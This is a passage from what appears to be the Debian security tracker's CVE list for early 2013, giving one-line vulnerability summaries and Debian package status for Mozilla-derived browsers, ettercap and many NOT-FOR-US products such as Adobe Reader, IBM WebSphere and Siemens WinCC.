experimental) - iceweasel (Doesn't affect the ESR series, only releases from experimental) - icedove (Doesn't affect the ESR series, only releases from experimental) CVE-2013-0763 (Use-after-free vulnerability in Mozilla Firefox before 18.0, Firefox E ...) - iceape (Doesn't affect the ESR series, only releases from experimental) - iceweasel (Doesn't affect the ESR series, only releases from experimental) - icedove (Doesn't affect the ESR series, only releases from experimental) CVE-2013-0762 (Use-after-free vulnerability in the imgRequest::OnStopFrame function i ...) - iceweasel 10.0.12esr-1 [squeeze] - iceweasel [squeeze] - icedove - icedove 10.0.12-1 - iceape 2.7.12-1 [squeeze] - iceape CVE-2013-0761 (Use-after-free vulnerability in the mozilla::TrackUnionStream::EndTrac ...) - iceape (Doesn't affect the ESR series, only releases from experimental) - iceweasel (Doesn't affect the ESR series, only releases from experimental) - icedove (Doesn't affect the ESR series, only releases from experimental) CVE-2013-0760 (Buffer overflow in the CharDistributionAnalysis::HandleOneChar functio ...) - iceape (Doesn't affect the ESR series, only releases from experimental) - iceweasel (Doesn't affect the ESR series, only releases from experimental) - icedove (Doesn't affect the ESR series, only releases from experimental) CVE-2013-0759 (Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x ...) - iceweasel 10.0.12esr-1 [squeeze] - iceweasel [squeeze] - icedove - icedove 10.0.12-1 - iceape 2.7.12-1 [squeeze] - iceape CVE-2013-0758 (Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x ...) - iceweasel 10.0.12esr-1 [squeeze] - iceweasel [squeeze] - icedove - icedove 10.0.12-1 - iceape 2.7.12-1 [squeeze] - iceape CVE-2013-0757 (The Chrome Object Wrapper (COW) implementation in Mozilla Firefox befo ...) - iceape (Doesn't affect the ESR series, only releases from experimental) - iceweasel (Doesn't affect the ESR series, only releases from experimental) - icedove (Doesn't affect the ESR series, only releases from experimental) CVE-2013-0756 (Use-after-free vulnerability in the obj_toSource function in Mozilla F ...) - iceape (Doesn't affect the ESR series, only releases from experimental) - iceweasel (Doesn't affect the ESR series, only releases from experimental) - icedove (Doesn't affect the ESR series, only releases from experimental) CVE-2013-0755 (Use-after-free vulnerability in the mozVibrate implementation in the V ...) - iceape (Doesn't affect the ESR series, only releases from experimental) - iceweasel (Doesn't affect the ESR series, only releases from experimental) - icedove (Doesn't affect the ESR series, only releases from experimental) CVE-2013-0754 (Use-after-free vulnerability in the ListenerManager implementation in ...) - iceweasel 10.0.12esr-1 [squeeze] - iceweasel [squeeze] - icedove - icedove 10.0.12-1 - iceape 2.7.12-1 [squeeze] - iceape CVE-2013-0753 (Use-after-free vulnerability in the serializeToStream implementation i ...) - iceweasel 10.0.12esr-1 [squeeze] - iceweasel - icedove 10.0.12-1 [squeeze] - icedove - iceape 2.7.12-1 [squeeze] - iceape CVE-2013-0752 (Mozilla Firefox before 18.0, Firefox ESR 17.x before 17.0.2, Thunderbi ...) - iceape (Doesn't affect the ESR series, only releases from experimental) - iceweasel (Doesn't affect the ESR series, only releases from experimental) - icedove (Doesn't affect the ESR series, only releases from experimental) CVE-2013-0751 (Mozilla Firefox before 18.0 on Android and SeaMonkey before 2.15 do no ...) - iceape (Android-specific) - iceweasel (Android-specific) - icedove (Android-specific) CVE-2013-0750 (Integer overflow in the JavaScript implementation in Mozilla Firefox b ...) - iceweasel 10.0.12esr-1 [squeeze] - iceweasel [squeeze] - icedove - icedove 10.0.12-1 - iceape 2.7.12-1 [squeeze] - iceape CVE-2013-0749 (Multiple unspecified vulnerabilities in the browser engine in Mozilla ...) - iceape (Doesn't affect the ESR series, only releases from experimental) - iceweasel (Doesn't affect the ESR series, only releases from experimental) - icedove (Doesn't affect the ESR series, only releases from experimental) CVE-2013-0748 (The XBL.__proto__.toString implementation in Mozilla Firefox before 18 ...) - iceweasel 10.0.12esr-1 [squeeze] - iceweasel [squeeze] - icedove - icedove 10.0.12-1 - iceape 2.7.12-1 [squeeze] - iceape CVE-2013-0747 (The gPluginHandler.handleEvent function in the plugin handler in Mozil ...) - iceape (Doesn't affect the ESR series, only releases from experimental) - iceweasel (Doesn't affect the ESR series, only releases from experimental) - icedove (Doesn't affect the ESR series, only releases from experimental) CVE-2013-0746 (Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x ...) - iceweasel 10.0.12esr-1 [squeeze] - iceweasel [squeeze] - icedove - icedove 10.0.12-1 - iceape 2.7.12-1 [squeeze] - iceape CVE-2013-0745 (The AutoWrapperChanger class in Mozilla Firefox before 18.0, Firefox E ...) - iceape (Doesn't affect the ESR series, only releases from experimental) - iceweasel (Doesn't affect the ESR series, only releases from experimental) - icedove (Doesn't affect the ESR series, only releases from experimental) CVE-2013-0744 (Use-after-free vulnerability in the TableBackgroundPainter::TableBackg ...) - iceweasel 10.0.12esr-1 [squeeze] - iceweasel - icedove 10.0.12-1 [squeeze] - icedove - iceape 2.7.12-1 [squeeze] - iceape CVE-2013-0743 REJECTED CVE-2013-0742 (Stack-based buffer overflow in Corel PDF Fusion 1.11 allows remote att ...) NOT-FOR-US: Corel PDF Fusion CVE-2013-0741 (Cross-site scripting (XSS) vulnerability in imagegen.ashx in Percipien ...) NOT-FOR-US: Percipient Studios ImageGen CVE-2013-0740 (Open redirect vulnerability in Dell OpenManage Server Administrator (O ...) NOT-FOR-US: Dell OpenManage Server Administrator CVE-2013-0739 (Chamilo 1.9.4 has XSS due to improper validation of user-supplied inpu ...) NOT-FOR-US: Chamilo LMS CVE-2013-0738 (Chamilo 1.9.4 has Multiple XSS and HTML Injection Vulnerabilities: blo ...) NOT-FOR-US: Chamilo LMS CVE-2013-0737 (Cross-site scripting (XSS) vulnerability in BoltWire 3.5 and earlier a ...) NOT-FOR-US: BoltWire CVE-2013-0736 (Multiple cross-site request forgery (CSRF) vulnerabilities in the Ming ...) NOT-FOR-US: mingle forum plugin for wp CVE-2013-0735 (Multiple SQL injection vulnerabilities in wpf.class.php in the Mingle ...) NOT-FOR-US: Mingle Forum Wordpress plugin CVE-2013-0734 (Multiple cross-site scripting (XSS) vulnerabilities in the Mingle Foru ...) NOT-FOR-US: Mingle Forum Wordpress plugin CVE-2013-0733 (Untrusted search path vulnerability in Corel PaintShop Pro X5 and X6 1 ...) NOT-FOR-US: Corel PaintShop Pro CVE-2013-0732 (Heap-based buffer overflow in PDFCore8.dll in Nuance PDF Reader before ...) NOT-FOR-US: Nuance PDF Reader CVE-2013-0731 (ajax.functions.php in the MailUp plugin before 1.3.3 for WordPress doe ...) NOT-FOR-US: MailUp plugin for Wordpress CVE-2013-0730 (Multiple cross-site scripting (XSS) vulnerabilities in Newscoop 4.x th ...) NOT-FOR-US: Newscoop CVE-2013-0729 (Heap-based buffer overflow in Tracker Software PDF-XChange before 2.5. ...) NOT-FOR-US: Tracker Software PDF-XChange CVE-2013-0728 (Multiple stack-based buffer overflows in NCSAddOn.dll in the ERDAS APO ...) NOT-FOR-US: ERDAS ECWP Browser Plugin CVE-2013-0727 (Multiple untrusted search path vulnerabilities in Global Mapper 14.1.0 ...) NOT-FOR-US: Global Mapper CVE-2013-0726 (Stack-based buffer overflow in the ERM_convert_to_correct_webpath func ...) NOT-FOR-US: ERDAS ER Viewer CVE-2013-0725 (ERDAS ER Viewer 13.0 has dwmapi.dll and irml.dll libraries arbitrary c ...) NOT-FOR-US: ERDAS ER Viewer CVE-2013-0724 (PHP remote file inclusion vulnerability in includes/generate-pdf.php i ...) NOT-FOR-US: Wordpress plugin ecommerce Shop Styling CVE-2013-0723 (Multiple heap-based buffer overflows in etxrw.dll in Kingsoft Spreadsh ...) NOT-FOR-US: Kingsoft Spreadsheets CVE-2013-0722 (Stack-based buffer overflow in the scan_load_hosts function in ec_scan ...) - ettercap 1:0.7.5.1-2 (low; bug #697987) [squeeze] - ettercap 1:0.7.3-2.1+squeeze1 NOTE: https://www.openwall.com/lists/oss-security/2013/01/10/2 NOTE: http://www.exploit-db.com/exploits/23945/ NOTE: https://secunia.com/advisories/51731/ NOTE: Proposed patch http://www.securation.com/files/2013/01/ec.patch CVE-2013-0721 (wp-php-widget.php in the WP PHP widget plugin 1.0.2 for WordPress allo ...) NOT-FOR-US: WordPress plugin CVE-2013-0720 (The COBIME application before 0.9.4 for Android uses weak permissions ...) NOT-FOR-US: COBIME CVE-2013-0719 (The ArtIME Japanese Input application 1.1.2 and earlier for Android us ...) NOT-FOR-US: ArtIME Japanese Input application CVE-2013-0718 (The Simeji application 4.8.1 and earlier for Android uses weak permiss ...) NOT-FOR-US: Simeji CVE-2013-0717 (Multiple cross-site request forgery (CSRF) vulnerabilities in the web- ...) NOT-FOR-US: NEC Aterm routers CVE-2013-0716 (The web server in Wind River VxWorks 5.5 through 6.9 allows remote att ...) NOT-FOR-US: Wind River VxWorks CVE-2013-0715 (The WebCLI component in Wind River VxWorks 5.5 through 6.9 allows remo ...) NOT-FOR-US: Wind River VxWorks CVE-2013-0714 (IPSSH (aka the SSH server) in Wind River VxWorks 6.5 through 6.9 allow ...) NOT-FOR-US: Wind River VxWorks CVE-2013-0713 (IPSSH (aka the SSH server) in Wind River VxWorks 6.5 through 6.9 allow ...) NOT-FOR-US: Wind River VxWorks CVE-2013-0712 (IPSSH (aka the SSH server) in Wind River VxWorks 6.5 through 6.9 allow ...) NOT-FOR-US: Wind River VxWorks CVE-2013-0711 (IPSSH (aka the SSH server) in Wind River VxWorks 6.5 through 6.9 allow ...) NOT-FOR-US: Wind River VxWorks CVE-2013-0710 (Buffer overflow in Kingsoft Writer 2007 and 2010 before 2724 allows re ...) NOT-FOR-US: Kingsoft Writer CVE-2013-0709 (Cross-site scripting (XSS) vulnerability in dopvSTAR* 0091 allows remo ...) NOT-FOR-US: Bayashi dopvSTAR CVE-2013-0708 (Cross-site scripting (XSS) vulnerability in dopvCOMET* 0009b allows re ...) NOT-FOR-US: Bayashi dopvCOMET CVE-2013-0707 (Unspecified vulnerability in JustSystems Ichitaro 2006 and 2007, Ichit ...) NOT-FOR-US: JustSystems Ichitaro CVE-2013-0706 (NEC Universal RAID Utility 1.40 Rev 680 and earlier, 2.31 Rev 1492 and ...) NOT-FOR-US: NEC Universal RAID Utility CVE-2013-0705 (Directory traversal vulnerability in LSI 3ware Disk Manager (3DM) befo ...) NOT-FOR-US: LSI 3ware Disk Manager CVE-2013-0704 (Directory traversal vulnerability in the GREE application before 1.3.3 ...) NOT-FOR-US: GREE Android app CVE-2013-0703 (Cross-site scripting (XSS) vulnerability in imgboard.com imgboard befo ...) NOT-FOR-US: imgboard CVE-2013-0702 (Cross-site scripting (XSS) vulnerability in Cybozu Garoon 2.0.0 throug ...) NOT-FOR-US: Cybozu Garoon CVE-2013-0701 (SQL injection vulnerability in Cybozu Garoon 2.5.0 through 3.5.3 allow ...) NOT-FOR-US: Cybozu Garoon CVE-2013-0700 (Siemens SIMATIC S7-1200 PLCs 2.x and 3.x allow remote attackers to cau ...) NOT-FOR-US: Siemens SIMATIC CVE-2013-0699 (The Galil RIO-47100 Pocket PLC allows remote attackers to cause a deni ...) NOT-FOR-US: Galil RIO-47100 CVE-2013-0698 REJECTED CVE-2013-0697 REJECTED CVE-2013-0696 REJECTED CVE-2013-0695 REJECTED CVE-2013-0694 (The Emerson Process Management ROC800 RTU with software 3.50 and earli ...) NOT-FOR-US: Emerson Process Management CVE-2013-0693 (The kernel in ENEA OSE on the Emerson Process Management ROC800 RTU wi ...) NOT-FOR-US: Emerson Process Management CVE-2013-0692 (The kernel in ENEA OSE on the Emerson Process Management ROC800 RTU wi ...) NOT-FOR-US: Emerson Process Management CVE-2013-0691 REJECTED CVE-2013-0690 REJECTED CVE-2013-0689 (The TFTP server on the Emerson Process Management ROC800 RTU with soft ...) NOT-FOR-US: Emerson Process Management CVE-2013-0688 (Cross-site scripting (XSS) vulnerability in Invensys Wonderware Inform ...) NOT-FOR-US: Invensys Wonderware Information Server CVE-2013-0687 (The installer routine in Schneider Electric MiCOM S1 Studio uses world ...) NOT-FOR-US: Schneider Electric CVE-2013-0686 (Invensys Wonderware Information Server (WIS) 4.0 SP1SP1, 4.5- Portal, ...) NOT-FOR-US: Invensys Wonderware Information Server CVE-2013-0685 (Invensys Wonderware Information Server (WIS) 4.0 SP1SP1, 4.5- Portal, ...) NOT-FOR-US: Invensys Wonderware Information Server CVE-2013-0684 (SQL injection vulnerability in Invensys Wonderware Information Server ...) NOT-FOR-US: Invensys Wonderware Information Server CVE-2013-0683 (The DataSim and DataPid demonstration clients in Cogent Real-Time Syst ...) NOT-FOR-US: DataSim and DataPid demonstration clients CVE-2013-0682 (Cogent Real-Time Systems Cogent DataHub before 7.3.0, OPC DataHub befo ...) NOT-FOR-US: Cogent DataHub CVE-2013-0681 (Cogent Real-Time Systems Cogent DataHub before 7.3.0, OPC DataHub befo ...) NOT-FOR-US: Cogent DataHub CVE-2013-0680 (Stack-based buffer overflow in the web server in Cogent Real-Time Syst ...) NOT-FOR-US: Cogent DataHub CVE-2013-0679 (Directory traversal vulnerability in the web server in Siemens WinCC b ...) NOT-FOR-US: Siemens WinCC CVE-2013-0678 (Siemens WinCC before 7.2, as used in SIMATIC PCS7 before 8.0 SP1 and o ...) NOT-FOR-US: Siemens WinCC CVE-2013-0677 (The web server in Siemens WinCC before 7.2, as used in SIMATIC PCS7 be ...) NOT-FOR-US: Siemens WinCC CVE-2013-0676 (Siemens WinCC before 7.2, as used in SIMATIC PCS7 before 8.0 SP1 and o ...) NOT-FOR-US: Siemens WinCC CVE-2013-0675 (Buffer overflow in CCEServer (aka the central communications component ...) NOT-FOR-US: Siemens WinCC CVE-2013-0674 (Buffer overflow in the RegReader ActiveX control in Siemens WinCC befo ...) NOT-FOR-US: Siemens WinCC CVE-2013-0673 (Directory traversal vulnerability in the web interface in the Health M ...) NOT-FOR-US: MatrikonOPC CVE-2013-0672 (Cross-site scripting (XSS) vulnerability in the HMI web application in ...) NOT-FOR-US: Siemens WinCC CVE-2013-0671 (Directory traversal vulnerability in Siemens WinCC (TIA Portal) 11 all ...) NOT-FOR-US: Siemens WinCC CVE-2013-0670 (CRLF injection vulnerability in the HMI web application in Siemens Win ...) NOT-FOR-US: Siemens WinCC CVE-2013-0669 (The HMI web application in Siemens WinCC (TIA Portal) 11 allows remote ...) NOT-FOR-US: Siemens WinCC CVE-2013-0668 (Multiple cross-site scripting (XSS) vulnerabilities in the HMI web app ...) NOT-FOR-US: Siemens WinCC CVE-2013-0667 (Cross-site scripting (XSS) vulnerability in the HMI web application in ...) NOT-FOR-US: Siemens WinCC CVE-2013-0666 (The configuration utility in MatrikonOPC Security Gateway 1.0 allows r ...) NOT-FOR-US: MatrikonOPC CVE-2013-0665 (Schweitzer Engineering Laboratories (SEL) AcSELerator QuickSet before ...) NOT-FOR-US: Schweitzer Engineering Laboratories AcSELerator QuickSet CVE-2013-0664 (The FactoryCast service on the Schneider Electric Quantum 140NOE77111 ...) NOT-FOR-US: Schneider Electric Quantum modules CVE-2013-0663 (Cross-site request forgery (CSRF) vulnerability on the Schneider Elect ...) NOT-FOR-US: Schneider Electric Quantum modules CVE-2013-0662 (Multiple stack-based buffer overflows in ModbusDrv.exe in Schneider El ...) NOT-FOR-US: Schneider Electric CVE-2013-0661 RESERVED CVE-2013-0660 RESERVED CVE-2013-0659 (The debugging feature on the Siemens CP 1604 and CP 1616 interface car ...) NOT-FOR-US: Siemens Interface Card CVE-2013-0658 (Heap-based buffer overflow in RFManagerService.exe in Schneider Electr ...) NOT-FOR-US: Schneider Electric Accutech Manager CVE-2013-0657 (Stack-based buffer overflow in Schneider Electric Interactive Graphica ...) NOT-FOR-US: Schneider Electric IGSS CVE-2013-0656 (Buffer overflow in a third-party ActiveX component in Siemens SIMATIC ...) NOT-FOR-US: Siemens SIMATIC CVE-2013-0655 (The client in Schneider Electric Software Update (SESU) Utility 1.0.x ...) NOT-FOR-US: Schneider Electric SESU CVE-2013-0654 (CimWebServer in GE Intelligent Platforms Proficy HMI/SCADA - CIMPLICIT ...) NOT-FOR-US: GE Intelligent Platforms Proficy CVE-2013-0653 (Directory traversal vulnerability in substitute.bcl in the WebView Cim ...) NOT-FOR-US: GE Intelligent Platforms Proficy CVE-2013-0652 (GE Intelligent Platforms Proficy Real-Time Information Portal does not ...) NOT-FOR-US: GE Intelligent Platforms Proficy CVE-2013-0651 (The Portal installation process in GE Intelligent Platforms Proficy Re ...) NOT-FOR-US: GE Intelligent Platforms Proficy CVE-2013-0650 (Use-after-free vulnerability in Adobe Flash Player before 10.3.183.68 ...) NOT-FOR-US: Adobe Flash Plugin CVE-2013-0649 (Use-after-free vulnerability in Adobe Flash Player before 10.3.183.63 ...) NOT-FOR-US: Adobe Flash Plugin CVE-2013-0648 (Unspecified vulnerability in the ExternalInterface ActionScript functi ...) NOT-FOR-US: Adobe Flash Plugin CVE-2013-0647 (Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on ...) NOT-FOR-US: Adobe Flash Plugin CVE-2013-0646 (Integer overflow in Adobe Flash Player before 10.3.183.68 and 11.x bef ...) NOT-FOR-US: Adobe Flash Plugin CVE-2013-0645 (Buffer overflow in Adobe Flash Player before 10.3.183.63 and 11.x befo ...) NOT-FOR-US: Adobe Flash Plugin CVE-2013-0644 (Use-after-free vulnerability in Adobe Flash Player before 10.3.183.63 ...) NOT-FOR-US: Adobe Flash Plugin CVE-2013-0643 (The Firefox sandbox in Adobe Flash Player before 10.3.183.67 and 11.x ...) NOT-FOR-US: Adobe Flash Plugin CVE-2013-0642 (Buffer overflow in Adobe Flash Player before 10.3.183.63 and 11.x befo ...) NOT-FOR-US: Adobe Flash Plugin CVE-2013-0641 (Buffer overflow in Adobe Reader and Acrobat 9.x before 9.5.4, 10.x bef ...) NOT-FOR-US: Adobe Reader CVE-2013-0640 (Adobe Reader and Acrobat 9.x before 9.5.4, 10.x before 10.1.6, and 11. ...) NOT-FOR-US: Adobe Reader CVE-2013-0639 (Integer overflow in Adobe Flash Player before 10.3.183.63 and 11.x bef ...) NOT-FOR-US: Adobe Flash Plugin CVE-2013-0638 (Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on ...) NOT-FOR-US: Adobe Flash Plugin CVE-2013-0637 (Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on ...) NOT-FOR-US: Adobe Flash Plugin CVE-2013-0636 (Stack-based buffer overflow in Adobe Shockwave Player before 12.0.0.11 ...) NOT-FOR-US: Adobe Shockwave Player CVE-2013-0635 (Adobe Shockwave Player before 12.0.0.112 allows attackers to execute a ...) NOT-FOR-US: Adobe Shockwave Player CVE-2013-0634 (Adobe Flash Player before 10.3.183.51 and 11.x before 11.5.502.149 on ...) NOT-FOR-US: Adobe Flash Plugin CVE-2013-0633 (Buffer overflow in Adobe Flash Player before 10.3.183.51 and 11.x befo ...) NOT-FOR-US: Adobe Flash Plugin CVE-2013-0632 (administrator.cfc in Adobe ColdFusion 9.0, 9.0.1, 9.0.2, and 10 allows ...) NOT-FOR-US: Adobe ColdFusion CVE-2013-0631 (Adobe ColdFusion 9.0, 9.0.1, and 9.0.2 allows attackers to obtain sens ...) NOT-FOR-US: Adobe ColdFusion CVE-2013-0630 (Buffer overflow in Adobe Flash Player before 10.3.183.50 and 11.x befo ...) NOT-FOR-US: Adobe Flash Player CVE-2013-0629 (Adobe ColdFusion 9.0, 9.0.1, 9.0.2, and 10, when a password is not con ...) NOT-FOR-US: Adobe ColdFusion CVE-2013-0628 REJECTED CVE-2013-0627 (Unspecified vulnerability in Adobe Reader and Acrobat 9.x before 9.5.3 ...) NOT-FOR-US: Adobe Reader and Acrobat CVE-2013-0626 (Stack-based buffer overflow in Adobe Reader and Acrobat 9.x before 9.5 ...) NOT-FOR-US: Adobe Reader and Acrobat CVE-2013-0625 (Adobe ColdFusion 9.0, 9.0.1, and 9.0.2, when a password is not configu ...) NOT-FOR-US: Adobe ColdFusion CVE-2013-0624 (Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and 11. ...) NOT-FOR-US: Adobe Reader and Acrobat CVE-2013-0623 (Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and 11. ...) NOT-FOR-US: Adobe Reader and Acrobat CVE-2013-0622 (Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and 11. ...) NOT-FOR-US: Adobe Reader and Acrobat CVE-2013-0621 (Buffer overflow in Adobe Reader and Acrobat 9.x before 9.5.3, 10.x bef ...) NOT-FOR-US: Adobe Reader and Acrobat CVE-2013-0620 (Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and 11. ...) NOT-FOR-US: Adobe Reader and Acrobat CVE-2013-0619 (Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and 11. ...) NOT-FOR-US: Adobe Reader and Acrobat CVE-2013-0618 (Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and 11. ...) NOT-FOR-US: Adobe Reader and Acrobat CVE-2013-0617 (Buffer overflow in Adobe Reader and Acrobat 9.x before 9.5.3, 10.x bef ...) NOT-FOR-US: Adobe Reader and Acrobat CVE-2013-0616 (Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and 11. ...) NOT-FOR-US: Adobe Reader and Acrobat CVE-2013-0615 (Buffer overflow in Adobe Reader and Acrobat 9.x before 9.5.3, 10.x bef ...) NOT-FOR-US: Adobe Reader and Acrobat CVE-2013-0614 (Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and 11. ...) NOT-FOR-US: Adobe Reader and Acrobat CVE-2013-0613 (Integer overflow in Adobe Reader and Acrobat 9.x before 9.5.3, 10.x be ...) NOT-FOR-US: Adobe Reader and Acrobat CVE-2013-0612 (Buffer overflow in Adobe Reader and Acrobat 9.x before 9.5.3, 10.x bef ...) NOT-FOR-US: Adobe Reader and Acrobat CVE-2013-0611 (Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and 11. ...) NOT-FOR-US: Adobe Reader and Acrobat CVE-2013-0610 (Stack-based buffer overflow in Adobe Reader and Acrobat 9.x before 9.5 ...) NOT-FOR-US: Adobe Reader and Acrobat CVE-2013-0609 (Integer overflow in Adobe Reader and Acrobat 9.x before 9.5.3, 10.x be ...) NOT-FOR-US: Adobe Reader and Acrobat CVE-2013-0608 (Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and 11. ...) NOT-FOR-US: Adobe Reader and Acrobat CVE-2013-0607 (Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and 11. ...) NOT-FOR-US: Adobe Reader and Acrobat CVE-2013-0606 (Buffer overflow in Adobe Reader and Acrobat 9.x before 9.5.3, 10.x bef ...) NOT-FOR-US: Adobe Reader and Acrobat CVE-2013-0605 (Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and 11. ...) NOT-FOR-US: Adobe Reader and Acrobat CVE-2013-0604 (Heap-based buffer overflow in Adobe Reader and Acrobat 9.x before 9.5. ...) NOT-FOR-US: Adobe Reader and Acrobat CVE-2013-0603 (Heap-based buffer overflow in Adobe Reader and Acrobat 9.x before 9.5. ...) NOT-FOR-US: Adobe Reader and Acrobat CVE-2013-0602 (Use-after-free vulnerability in Adobe Reader and Acrobat 9.x before 9. ...) NOT-FOR-US: Adobe Reader and Acrobat CVE-2013-0601 (Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and 11. ...) NOT-FOR-US: Adobe Reader and Acrobat CVE-2013-0600 (Unspecified vulnerability on IBM WebSphere DataPower XC10 Appliance de ...) NOT-FOR-US: IBM WebSphere DataPower XC10 Appliance devices CVE-2013-0599 (IBM Eclipse Help System (IEHS), as used in IBM Rational Directory Serv ...) NOT-FOR-US: IBM CVE-2013-0598 (Cross-site request forgery (CSRF) vulnerability in the Web Client in I ...) NOT-FOR-US: IBM Rational ClearQuest CVE-2013-0597 (Cross-site scripting (XSS) vulnerability in IBM WebSphere Application ...) NOT-FOR-US: IBM WebSphere Application Server CVE-2013-0596 (Cross-site scripting (XSS) vulnerability in the Administrative console ...) NOT-FOR-US: IBM WebSphere Application Server CVE-2013-0595 (Multiple cross-site scripting (XSS) vulnerabilities in iNotes 8.5.x in ...) NOT-FOR-US: IBM Lotus Domino CVE-2013-0594 (Open redirect vulnerability in IBM iNotes before 8.5.3 Fix Pack 6 and ...) NOT-FOR-US: IBM CVE-2013-0593 (Unspecified vulnerability in the olch2x32 ActiveX control in IBM SPSS ...) NOT-FOR-US: IBM SPSS SamplePower CVE-2013-0592 (Cross-site scripting (XSS) vulnerability in IBM iNotes before 8.5.3 Fi ...) NOT-FOR-US: IBM CVE-2013-0591 (Cross-site scripting (XSS) vulnerability in iNotes 8.5.x in IBM Lotus ...) NOT-FOR-US: IBM Lotus Domino CVE-2013-0590 (Cross-site scripting (XSS) vulnerability in iNotes 8.5.x in IBM Lotus ...) NOT-FOR-US: IBM Lotus Domino CVE-2013-0589 (IBM iNotes before 8.5.3 Fix Pack 6 and 9.x before 9.0.1 allows remote ...) NOT-FOR-US: IBM CVE-2013-0588 RESERVED CVE-2013-0587 (Multiple cross-site scripting (XSS) vulnerabilities in IBM WebSphere P ...) NOT-FOR-US: IBM InfoSphere CVE-2013-0586 (Cross-site scripting (XSS) vulnerability in the server in IBM Cognos B ...) NOT-FOR-US: IBM Cognos CVE-2013-0585 (Multiple cross-site scripting (XSS) vulnerabilities in IBM InfoSphere ...) NOT-FOR-US: IBM InfoSphere CVE-2013-0584 (The Data Replication Dashboard component in IBM InfoSphere Replication ...) NOT-FOR-US: IBM InfoSphere Replication Server CVE-2013-0583 RESERVED CVE-2013-0582 (Cross-site scripting (XSS) vulnerability in IBM Tivoli Federated Ident ...) NOT-FOR-US: IBM Tivoli Federated Identity Manager CVE-2013-0581 (Multiple cross-site scripting (XSS) vulnerabilities in IBM Business Pr ...) NOT-FOR-US: IBM CVE-2013-0580 (Cross-site request forgery (CSRF) vulnerability in the Optim E-Busines ...) NOT-FOR-US: IBM CVE-2013-0579 (The Optim E-Business Console in IBM Data Growth Solution for Oracle E- ...) NOT-FOR-US: IBM CVE-2013-0578 (The Sterling Order Management APIs in IBM Sterling Multi-Channel Fulfi ...) NOT-FOR-US: IBM CVE-2013-0577 (The Optim E-Business Console in IBM Data Growth Solution for Oracle E- ...) NOT-FOR-US: IBM CVE-2013-0576 (Cross-site scripting (XSS) vulnerability in the Tivoli Enterprise Port ...) NOT-FOR-US: IBM Tivoli Monitoring CVE-2013-0575 RESERVED CVE-2013-0574 RESERVED CVE-2013-0573 RESERVED CVE-2013-0572 (Cross-site scripting (XSS) vulnerability in IBM Document Connect for A ...) NOT-FOR-US: IBM Document Connect for Application Support Facility CVE-2013-0571 (Cross-site scripting (XSS) vulnerability in IBM Document Connect for A ...) NOT-FOR-US: IBM Document Connect for Application Support Facility CVE-2013-0570 (The Fibre Channel over Ethernet (FCoE) feature in IBM System Networkin ...) NOT-FOR-US: IBM CVE-2013-0569 (Cross-site scripting (XSS) vulnerability in the Communities component ...) NOT-FOR-US: IBM Connections CVE-2013-0568 (IBM Sterling B2B Integrator 5.1 and 5.2 and Sterling File Gateway 2.1 ...) NOT-FOR-US: IBM CVE-2013-0567 (IBM Sterling B2B Integrator 5.1 and 5.2 and Sterling File Gateway 2.1 ...) NOT-FOR-US: IBM CVE-2013-0566 (Multiple cross-site scripting (XSS) vulnerabilities in the (1) Acceler ...) NOT-FOR-US: IBM WebSphere Commerce CVE-2013-0565 (Cross-site scripting (XSS) vulnerability in the RPC adapter for the We ...) NOT-FOR-US: IBM WebSphere Application Server CVE-2013-0564 RESERVED CVE-2013-0563 RESERVED CVE-2013-0562 RESERVED CVE-2013-0561 RESERVED CVE-2013-0560 (Multiple SQL injection vulnerabilities in IBM Sterling B2B Integrator ...) NOT-FOR-US: IBM CVE-2013-0559 (Unspecified vulnerability in IBM API Management 2.0 before 2.0.0.1 all ...) NOT-FOR-US: IBM CVE-2013-0558 (IBM Sterling B2B Integrator 5.1 and 5.2 and Sterling File Gateway 2.1 ...) NOT-FOR-US: IBM CVE-2013-0557 RESERVED CVE-2013-0556 RESERVED CVE-2013-0555 RESERVED CVE-2013-0554 RESERVED CVE-2013-0553 (The client implementation in IBM Sametime 8.5.1 through 8.5.2.1, as us ...) NOT-FOR-US: IBM Sametime CVE-2013-0552 RESERVED CVE-2013-0551 (The Basic Services component in IBM Tivoli Monitoring (ITM) 6.2.0 thro ...) NOT-FOR-US: IBM Tivoli Monitoring CVE-2013-0550 REJECTED CVE-2013-0549 (Cross-site scripting (XSS) vulnerability in the Web Content Manager - ...) NOT-FOR-US: IBM WebSphere Portal CVE-2013-0548 (Multiple cross-site scripting (XSS) vulnerabilities in the Basic Servi ...) NOT-FOR-US: IBM Tivoli CVE-2013-0547 RESERVED CVE-2013-0546 RESERVED CVE-2013-0545 RESERVED CVE-2013-0544 (Directory traversal vulnerability in the Administrative Console in IBM ...) NOT-FOR-US: IBM WebSphere Application Server CVE-2013-0543 (IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.47, 7.0 before ...) NOT-FOR-US: IBM WebSphere Application Server CVE-2013-0542 (Cross-site scripting (XSS) vulnerability in the Administrative console ...) NOT-FOR-US: IBM WebSphere Application Server CVE-2013-0541 (Buffer overflow in IBM WebSphere Application Server (WAS) 6.1 before 6 ...) NOT-FOR-US: IBM WebSphere Application Server CVE-2013-0540 (IBM WebSphere Application Server (WAS) Liberty Profile 8.5 before 8.5. ...) NOT-FOR-US: IBM WebSphere Application Server CVE-2013-0539 (An unspecified third-party component in IBM Sterling B2B Integrator 5. ...) NOT-FOR-US: IBM CVE-2013-0538 (Cross-site scripting (XSS) vulnerability in IBM Lotus Notes 8.x before ...) NOT-FOR-US: IBM 